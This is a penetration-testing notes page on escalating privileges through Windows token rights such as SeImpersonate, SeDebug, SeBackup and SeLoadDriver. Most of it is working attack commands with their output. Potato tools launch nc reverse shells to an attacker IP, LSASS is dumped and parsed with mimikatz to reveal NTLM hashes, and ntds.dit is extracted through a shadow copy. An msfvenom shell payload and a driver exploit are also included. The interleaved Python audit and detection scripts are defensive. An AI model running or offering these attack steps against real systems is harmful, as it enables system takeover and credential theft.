# User Privileges

## Dangerous Privileges

```
whoami /priv
```

{% content-ref url="/pages/9uU9lt0KHzC4i54KMr98" %}
[Enumeration](/0xss0rz/pentest/privilege-escalation/windows/enumeration.md)
{% endcontent-ref %}

Dangerous privileges:

```
SeBackupPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDebugPrivilege
SeTcbPrivilege
SeAssignPrimaryTokenPrivilege
SeTakeOwnershipPrivilege
```

{% embed url="https://seriotonctf.github.io/2024/08/10/Windows-Privesc/" %}

## Enable privileges

{% hint style="info" %}
*When a privilege is listed for our account in the `Disabled` state, it means that our account has the specific privilege assigned. Still, it cannot be used in an access token to perform the associated actions until it is enabled. Windows does not provide a built-in command or PowerShell cmdlet to enable privileges, so we need some scripting to help us out.*
{% endhint %}

From cmd:

{% embed url="https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges?s=03" %}

From PowerShell:

{% embed url="https://www.powershellgallery.com/packages/PoshPrivilege/0.3.0.0/Content/Scripts/Enable-Privilege.ps1" %}

```powershell-session
PS C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                              State
============================= ======================================================= ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                                Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                          Disabled
```

{% embed url="https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1" %}

```powershell-session
PS C:\htb> Import-Module .\Enable-Privilege.ps1
PS C:\htb> .\EnableAllTokenPrivs.ps1
PS C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                              State
============================= ======================================== =======
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Enable
```
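As an added example (not from the original page or any of the linked scripts), the following Python script parses `whoami /priv` output and flags the dangerous privileges listed at the top of this page, reporting whether each one is currently Enabled or only assigned (Disabled) in the token. A Disabled entry is still held and can be enabled by the account, so an audit must treat it as present. The sample output is constructed from the sessions shown on this page; the privilege-to-abuse mapping is the editor's summary of the sections below.

```python
"""Audit the output of `whoami /priv` for privileges that enable escalation.

Added example (not from the original page): parses the text that
`whoami /priv` prints and reports which of the dangerous privileges are
assigned, and whether each is Enabled or Disabled in the token. A Disabled
entry is still assigned and can be enabled by the holder, so it is held.
"""
import re

# Privileges this page treats as dangerous, with the abuse family they enable.
# (Editor's summary of the page's sections, not an official classification.)
DANGEROUS = {
    "SeBackupPrivilege": "read any file via backup semantics (SAM/NTDS copies)",
    "SeRestorePrivilege": "write any file or registry key via restore semantics",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeImpersonatePrivilege": "impersonate a client (potato family)",
    "SeAssignPrimaryTokenPrivilege": "replace a process token (potato family)",
    "SeDebugPrivilege": "open any process (LSASS dump, parent spoofing)",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeManageVolumePrivilege": "raw volume access",
}

# Constructed sample, modelled on the `whoami /priv` output shown on this page.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the state column.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} for every table row in the output."""
    result = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            result[m.group(1)] = m.group(2)
    return result


def dangerous_privileges(text):
    """Return [(name, state, why)] for held privileges that enable escalation,
    in the order they appear, regardless of whether they are Enabled."""
    held = parse_privileges(text)
    return [(name, state, DANGEROUS[name])
            for name, state in held.items() if name in DANGEROUS]


if __name__ == "__main__":
    for name, state, why in dangerous_privileges(SAMPLE):
        note = "" if state == "Enabled" else " (assigned but not yet enabled in this token)"
        print(f"{name:30} {state:8} {why}{note}")
```

Run it against a saved `whoami /priv` transcript from a service account (the SQL service account further down is a typical case) to see which potato-style paths the token already permits.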

## SeImpersonate

{% embed url="https://pentest.party/notes/windows/privilege-impersonate" %}

{% content-ref url="/pages/zKnHoEmkwvLtoFrs0oE5" %}
[MSSQL (1433)](/0xss0rz/pentest/protocols/mssql-1433.md)
{% endcontent-ref %}

```shell-session
mssqlclient.py sql_dev@10.129.43.30 -windows-auth
```

```shell-session
SQL> enable_xp_cmdshell
```

```shell-session
SQL> xp_cmdshell whoami /priv

output                                                                             

--------------------------------------------------------------------------------   
                                                                    
PRIVILEGES INFORMATION                                                             

----------------------                                                             
Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    
SeImpersonatePrivilege        Impersonate a client after authentication Enabled    
SeCreateGlobalPrivilege       Create global objects                     Enabled    
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   
```

### Juicy Potato

{% hint style="warning" %}
*JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards*
{% endhint %}

{% embed url="https://github.com/ohpe/juicy-potato" %}

```shell-session
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

output                                                                             

--------------------------------------------------------------------------------   

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375                               
                                                                            
[+] authresult 0                                                                   
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM                                                                                                    
[+] CreateProcessWithTokenW OK                                                     
[+] calling 0x000000000088ce08
```

```shell-session
$ sudo nc -lnvp 8443

listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 50332
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami

whoami
nt authority\system
```

#### CLSID Problems

If the default CLSID does not work on the target build, enumerate a usable one with the GetCLSID.ps1 script from the JuicyPotato repository and pass it with `-c`:

{% embed url="https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1" %}

```
.\juicypotato.exe -l 13337 -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\nc.exe 10.10.14.35 8443 -e cmd.exe" -t * -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
```


### PrintSpoofer

{% embed url="https://github.com/itm4n/PrintSpoofer" %}

```shell-session
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

output                                                                             

--------------------------------------------------------------------------------   

[+] Found privilege: SeImpersonatePrivilege                                        

[+] Named pipe listening...                                                        

[+] CreateProcessAsUser() OK                                                       

NULL 
```

```shell-session
$ nc -lnvp 8443

listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 49847
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami

whoami
nt authority\system
```

### RoguePotato

{% embed url="https://github.com/antonioCoco/RoguePotato" %}

### EfsPotato

{% embed url="https://github.com/zcgonvh/EfsPotato" %}

```
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
```

```
EfsPotato.exe "nc.exe -e cmd.exe 10.10.16.20 6666"
```

{% embed url="https://github.com/bugch3ck/SharpEfsPotato" %}

### SigmaPotato (GREAT POTATO :tada:)

{% embed url="https://github.com/tylerdotrar/SigmaPotato" %}

### GodPotato

{% embed url="https://github.com/BeichenDream/GodPotato" %}

Rust implementation:

{% embed url="https://github.com/safedv/RustPotato" %}

### CoercedPotato

{% embed url="https://github.com/Prepouce/CoercedPotato" %}

### DeadPotato

Obtains SYSTEM privileges:

{% embed url="https://github.com/lypd0/DeadPotato?s=03" %}

### Other Potatoes

{% embed url="https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all" %}

RemotePotato (User to DA) and LocalPotato (User to NT AUTHORITY\SYSTEM)

{% content-ref url="/pages/xUimpYOSzRPmD09mhh1n" %}
[NTLM elevation of privilege](/0xss0rz/pentest/privilege-escalation/windows/ntlm-elevation-of-privilege.md)
{% endcontent-ref %}

## SeAssignPrimaryToken

This can be abused with `JuicyPotato` or `JuicyPotatoNG`.

{% embed url="https://pentest.party/notes/windows/privilege-assign-primary-token" %}

## SeDebugPrivilege

{% embed url="https://github.com/trickster0/OffensiveRust/tree/master/EnableDebugPrivileges" %}

{% embed url="https://github.com/xct/SeDebugAbuse" %}

### LSASS Dump

Use [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) from the [SysInternals](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) suite to leverage this privilege and dump process memory.

```cmd-session
C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

Load the dump in `Mimikatz` with the `sekurlsa::minidump` command. After issuing `sekurlsa::logonPasswords`, we obtain the NTLM hash of the local administrator account logged on locally. We can use it for a pass-the-hash attack to move laterally if the same local administrator password is used on one or more additional systems (common in large organizations).

{% content-ref url="/pages/RyOH5l3XbYdEQwoowuVE" %}
[Mimikatz](/0xss0rz/pentest/tools/mimikatz.md)
{% endcontent-ref %}

{% content-ref url="/pages/2nk7AOHO745kf6QdjHnB" %}
[Pass the Hash (PtH)](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md)
{% endcontent-ref %}

```cmd-session
C:\htb> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/31/2021 3:00:57 PM
SID               : S-1-5-90-0-4
        msv :
        tspkg :
        wdigest :
         * Username : WINLPE-SRV01$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

<SNIP> 

Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session           : RemoteInteractive from 2
User Name         : jordan
Domain            : WINLPE-SRV01
Logon Server      : WINLPE-SRV01
Logon Time        : 3/31/2021 2:59:52 PM
SID               : S-1-5-21-3769161915-3336846931-3985975925-1000
        msv :
         [00000003] Primary
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
        tspkg :
        wdigest :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        kerberos :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        ssp :
        credman :

<SNIP>
```

### Remote Code Execution

{% embed url="https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1" %}

{% embed url="https://github.com/decoder-it/psgetsystem" %}

Load the script and run it with the following syntax: `[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")`

```powershell-session
PS C:\htb> tasklist 

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        116 K
smss.exe                       340 Services                   0      1,212 K
csrss.exe                      444 Services                   0      4,696 K
wininit.exe                    548 Services                   0      5,240 K
csrss.exe                      556 Console                    1      5,972 K
winlogon.exe                   612 Console                    1     10,408 K
```

Search for the `winlogon.exe` PID, since this process runs as SYSTEM on Windows hosts.

Alternatively, use `Get-Process` to grab the PID of a well-known process that runs as SYSTEM (such as LSASS) and pass the PID directly to the script.

{% hint style="info" %}
Often we will not have RDP access to a host, so we'll have to modify our PoCs to either return a reverse shell to our attack host as SYSTEM or another command, such as adding an admin user.
{% endhint %}
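The two SeDebugPrivilege techniques above (dumping LSASS with ProcDump, and spawning a command under a SYSTEM parent such as `winlogon.exe` or LSASS) both leave process telemetry a defender can match. The following Python detector is an added example, not part of this page or of the psgetsystem project; it runs two rules over constructed Sysmon-style events (EventID 10 ProcessAccess and EventID 1 ProcessCreate, using Sysmon's field names). The allowlist of processes permitted to open LSASS and the choice of `PROCESS_VM_READ` as the threshold are assumptions to tune per environment.

```python
"""Flag LSASS memory access and shells parented to SYSTEM processes.

Added example (not from the original page): two detection rules over
constructed Sysmon-style events. Rule 1 matches the ProcDump step
(EventID 10, ProcessAccess on lsass.exe with a read right). Rule 2 matches
the psgetsystem technique, which starts a command with a SYSTEM process such
as winlogon.exe or lsass.exe as its parent (EventID 1, ProcessCreate).
Field names follow Sysmon's schema; the event values are made up.
"""
from pathlib import PureWindowsPath

PROCESS_VM_READ = 0x0010   # the access right needed to read LSASS memory

# Source images that legitimately open lsass.exe (assumption: extend for your EDR/AV).
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}
# SYSTEM processes that should never be the parent of an interactive shell.
SYSTEM_PARENTS = {"winlogon.exe", "lsass.exe", "services.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe"}


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'C:\\x\\Y.exe' -> 'y.exe'."""
    return PureWindowsPath(path).name.lower()


def lsass_access(ev):
    """Sysmon EventID 10: a non-allowlisted process opened lsass.exe with read rights."""
    if ev.get("EventID") != 10 or basename(ev["TargetImage"]) != "lsass.exe":
        return None
    if basename(ev["SourceImage"]) in LSASS_ALLOWLIST:
        return None
    if int(ev["GrantedAccess"], 16) & PROCESS_VM_READ == 0:
        return None
    return f"lsass read by {ev['SourceImage']} (access {ev['GrantedAccess']})"


def spoofed_parent_shell(ev):
    """Sysmon EventID 1: a shell whose parent is a SYSTEM process."""
    if ev.get("EventID") != 1:
        return None
    if basename(ev["ParentImage"]) in SYSTEM_PARENTS and basename(ev["Image"]) in SHELLS:
        return f"{ev['Image']} spawned under {ev['ParentImage']} as {ev.get('User', '?')}"
    return None


RULES = (lsass_access, spoofed_parent_shell)


def detect(events):
    """Return the alert strings produced by every rule over every event."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\htb\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1000"},   # QUERY_LIMITED_INFORMATION only: no memory read
    {"EventID": 1, "Image": r"C:\Windows\system32\cmd.exe",
     "ParentImage": r"C:\Windows\system32\winlogon.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\system32\userinit.exe",   # normal winlogon child
     "ParentImage": r"C:\Windows\system32\winlogon.exe", "User": r"WINLPE-SRV01\jordan"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

ProcDump's `-ma` requests full access to the target, so the first event matches; a legitimate `winlogon.exe` child such as `userinit.exe` does not trip the second rule, while `cmd.exe` under `winlogon.exe` does.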

#### Other Tool

{% embed url="https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC" %}

## SeTakeOwnershipPrivilege

{% hint style="danger" %}
*Note: Take great care when performing a potentially destructive action like changing file ownership, as it could cause an application to stop working or disrupt user(s) of the target object. Changing the ownership of an important file, such as a live web.config file, is not something we would do without consent from our client first. Furthermore, changing ownership of a file buried down several subdirectories (while changing each subdirectory permission on the way down) may be difficult to revert and should be avoided.*
{% endhint %}

```powershell-session
PS C:\htb> Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
 
FullName                                 LastWriteTime         Attributes Owner
--------                                 -------------         ---------- -----
C:\Department Shares\Private\IT\cred.txt 6/18/2021 12:23:28 PM    Archive
```

The `Owner` column comes back empty, so check the owner with `dir /q`:

```powershell-session
PS C:\htb> cmd /c dir /q 'C:\Department Shares\Private\IT'

 Volume in drive C has no label.
 Volume Serial Number is 0C92-675B
 
 Directory of C:\Department Shares\Private\IT
 
06/18/2021  12:22 PM    <DIR>          WINLPE-SRV01\sccm_svc  .
06/18/2021  12:22 PM    <DIR>          WINLPE-SRV01\sccm_svc  ..
06/18/2021  12:23 PM                36 ...                    cred.txt
               1 File(s)             36 bytes
               2 Dir(s)  17,079,754,752 bytes free
```

Change ownership of the file

```powershell-session
PS C:\htb> takeown /f 'C:\Department Shares\Private\IT\cred.txt'
 
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student".
```

If you get `ERROR: File or Directory not found.`, remove the quotes: `takeown /f C:\TakeOwn\flag.txt`

Grant our user full privileges over the target file

```powershell-session
PS C:\htb> icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

processed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 files
```

```powershell-session
PS C:\htb> cat 'C:\Department Shares\Private\IT\cred.txt'
```

### When to use it?

**Files of Interest**

```shell-session
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
```

`.kdbx` KeePass database files, OneNote notebooks, files named `passwords.*`, `pass.*` or `creds.*`, scripts, other configuration files, virtual hard drive files, and more can be targeted to extract sensitive information and elevate our privileges.

{% content-ref url="/pages/OmHTjXnBoe2axONDoSia" %}
[Credentials Hunting](/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting.md)
{% endcontent-ref %}
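The defensive counterpart of "when to use it" is knowing which accounts have been granted these rights at all. The following added Python example (not from this page) parses the `[Privilege Rights]` section of the INF written by `secedit /export /cfg <file>` and reports holders of the dangerous privileges discussed on this page that are not part of the Windows defaults. The INF text and the extra SIDs (built on the SID shown in the Mimikatz output above) are constructed; the default-holder table is the editor's and assumes a workstation or member server, so adjust it for domain controllers (e.g. Server Operators, Print Operators) and for role accounts such as IIS_IUSRS on SeImpersonatePrivilege.

```python
"""Audit local user-rights assignment for non-default holders of dangerous privileges.

Added example (not from the original page). `secedit /export /cfg rights.inf`
writes the machine's user-rights assignment to an INF whose
[Privilege Rights] section lists each privilege with the SIDs that hold it
(prefixed with '*'). This script parses that section and reports every holder
that is not in the default set for the privileges this page discusses.
"""

ADMINISTRATORS = "S-1-5-32-544"
BACKUP_OPERATORS = "S-1-5-32-551"
SERVICE, LOCAL_SERVICE, NETWORK_SERVICE = "S-1-5-6", "S-1-5-19", "S-1-5-20"

# Default holders on a workstation / member server (editor's table; DCs differ).
DEFAULT_HOLDERS = {
    "SeBackupPrivilege": {ADMINISTRATORS, BACKUP_OPERATORS},
    "SeRestorePrivilege": {ADMINISTRATORS, BACKUP_OPERATORS},
    "SeTakeOwnershipPrivilege": {ADMINISTRATORS},
    "SeDebugPrivilege": {ADMINISTRATORS},
    "SeLoadDriverPrivilege": {ADMINISTRATORS},
    "SeManageVolumePrivilege": {ADMINISTRATORS},
    "SeTcbPrivilege": set(),
    "SeImpersonatePrivilege": {ADMINISTRATORS, SERVICE, LOCAL_SERVICE, NETWORK_SERVICE},
    "SeAssignPrimaryTokenPrivilege": {LOCAL_SERVICE, NETWORK_SERVICE},
}

# Constructed INF in the layout secedit produces; the -1000/-1105 RIDs are made up.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-3769161915-3336846931-3985975925-1000
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-21-3769161915-3336846931-3985975925-1105
SeTcbPrivilege = *S-1-5-21-3769161915-3336846931-3985975925-1105
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text):
    """Return {privilege: [sid, ...]} from the [Privilege Rights] section only."""
    rights, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):                      # section header
            in_section = line.lower() == "[privilege rights]"
            continue
        if in_section and "=" in line:
            name, _, holders = line.partition("=")
            rights[name.strip()] = [h.strip().lstrip("*")
                                    for h in holders.split(",") if h.strip()]
    return rights


def non_default_holders(inf_text):
    """Return {privilege: sorted extra SIDs} for dangerous privileges granted beyond defaults."""
    findings = {}
    for priv, holders in parse_privilege_rights(inf_text).items():
        if priv in DEFAULT_HOLDERS:
            extra = set(holders) - DEFAULT_HOLDERS[priv]
            if extra:
                findings[priv] = sorted(extra)
    return findings


if __name__ == "__main__":
    for priv, sids in non_default_holders(SAMPLE_INF).items():
        print(f"{priv}: non-default holders {', '.join(sids)}")
```

Resolve the reported SIDs with `wmic useraccount where sid='...' get name` or `Get-LocalUser`/`Get-ADObject`, and treat any human account holding SeTcbPrivilege, SeDebugPrivilege or SeBackupPrivilege as an immediate review item.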

## SeBackupPrivilege

See Backup Operators in [Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md)

```
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
...
SeBackupPrivilege             Back up files and directories  Enabled
...

```

`pwn.txt` (the diskshadow script; the trailing `X` on each line is padding, because diskshadow drops the last character of every line of this script, as the echoed `->` commands in the output below show):

```
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
```

```
*Evil-WinRM* PS C:\temp> upload pwn.txt

*Evil-WinRM* PS C:\temp> diskshadow /s pwn.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  1/18/2025 3:28:08 PM

-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Alias cdrive for shadow ID {924af307-fdb2-494e-8b80-e4f5a5f9815f} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {7caf2a78-c8c4-45af-b956-327869309d5c} set as environment variable.

Querying all shadow copies with the shadow copy set ID {7caf2a78-c8c4-45af-b956-327869309d5c}

	* Shadow copy ID = {924af307-fdb2-494e-8b80-e4f5a5f9815f}		%cdrive%
		- Shadow copy set: {7caf2a78-c8c4-45af-b956-327869309d5c}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
		- Creation time: 1/18/2025 3:28:23 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: BabyDC.baby.vl
		- Service machine: BabyDC.baby.vl
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent Differential

Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {924af307-fdb2-494e-8b80-e4f5a5f9815f}
The shadow copy was successfully exposed as E:\.
-> end backup
->


*Evil-WinRM* PS C:\temp> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Friday, August 9, 2024 10:57:58 PM
   Source : E:\windows\ntds\
     Dest : C:\temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            New File              16.0 m        ntds.dit

[snipped]

*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.

*Evil-WinRM* PS C:\temp> download system

Info: Downloading C:\temp\system to system

Info: Download successful!

*Evil-WinRM* PS C:\temp> download ntds.dit

Info: Downloading C:\temp\ntds.dit to ntds.dit

Info: Download successful!
```

```
secretsdump.py -system system -ntds ntds.dit local
```
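Added example (not from this page, Evil-WinRM, or any linked tool): the `diskshadow /s`, `robocopy /b` and `reg save` steps above each produce a process-creation record (Windows Security event 4688 or Sysmon EventID 1). Any one of them is noisy on its own; the same account running two or more stages is a strong signal of the backup-privilege credential theft chain. The Python below classifies command lines into those stages and reports accounts that hit more than one. The records are constructed, and the regular expressions are the editor's and will need tuning against legitimate backup jobs.

```python
"""Score process command lines for the backup-privilege credential theft chain.

Added example (not from the original page). Classifies 4688/Sysmon-style
command lines into the three stages used above (shadow copy via diskshadow,
backup-mode copy of NTDS or registry hives via robocopy /b, hive export via
reg save) and correlates them per account. All records are constructed.
"""
import re

# Stage patterns (editor's assumptions; adjust to your naming and paths).
STAGES = {
    "shadow_copy": re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I),
    "backup_copy": re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b.*\b(ntds|system32\\config)\b", re.I),
    "hive_save":   re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SYSTEM|SAM|SECURITY)\b", re.I),
}


def classify(cmdline):
    """Return the stage name a command line belongs to, or None if it matches none."""
    for name, pattern in STAGES.items():
        if pattern.search(cmdline):
            return name
    return None


def score(records):
    """Group matched stages per account: {account: sorted list of stage names}."""
    hits = {}
    for rec in records:
        stage = classify(rec["CommandLine"])
        if stage:
            hits.setdefault(rec["Account"], set()).add(stage)
    return {acct: sorted(stages) for acct, stages in hits.items()}


def high_confidence(records, min_stages=2):
    """Accounts that ran at least `min_stages` distinct stages of the chain."""
    return [acct for acct, stages in score(records).items() if len(stages) >= min_stages]


# Constructed records, modelled on the session above (account names are made up).
SAMPLE_RECORDS = [
    {"Account": r"BABY\caroline.robinson",
     "CommandLine": r'"C:\Windows\system32\diskshadow.exe" /s pwn.txt'},
    {"Account": r"BABY\caroline.robinson",
     "CommandLine": r"robocopy /b E:\Windows\ntds . ntds.dit"},
    {"Account": r"BABY\caroline.robinson",
     "CommandLine": r"reg save HKLM\SYSTEM c:\temp\system"},
    # A backup job in /b mode that does not touch NTDS or hives: not a stage.
    {"Account": r"BABY\backupsvc",
     "CommandLine": r"robocopy /b D:\shares\finance \\nas\finance /MIR"},
    # Reading the registry is not exporting a hive.
    {"Account": r"BABY\admin",
     "CommandLine": r"reg query HKLM\SYSTEM\CurrentControlSet\Services"},
]

if __name__ == "__main__":
    for acct, stages in score(SAMPLE_RECORDS).items():
        print(f"{acct}: {', '.join(stages)}")
    print("high confidence:", high_confidence(SAMPLE_RECORDS))
```

Command-line auditing must be enabled for 4688 to carry the `CommandLine` field; with Sysmon the field is present by default. The per-account correlation is what separates an operator staging `ntds.dit` from a routine `robocopy /b` file-server job.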

### NXC

```
nxc smb dc -u user -p pass -M backup_operator 
```


## SeLoadDriverPrivilege

```
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o shell.exe
```

{% embed url="https://github.com/k4sth4/SeLoadDriverPrivilege" %}

```
*Evil-WinRM* PS C:\temp> upload Capcom.sys
*Evil-WinRM* PS C:\temp> upload ExploitCapcom.exe
*Evil-WinRM* PS C:\temp> upload eoploaddriver_x64.exe
*Evil-WinRM* PS C:\temp> upload shell.exe

*Evil-WinRM* PS C:\temp> .\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\temp\Capcom.sys

*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe LOAD \temp\Capcom.sys

*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe EXPLOIT .\shell.exe
```

## SeTcbPrivilege

```
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
...
SeTcbPrivilege                Act as part of the operating system Enabled
...

```

{% embed url="https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178" %}

```
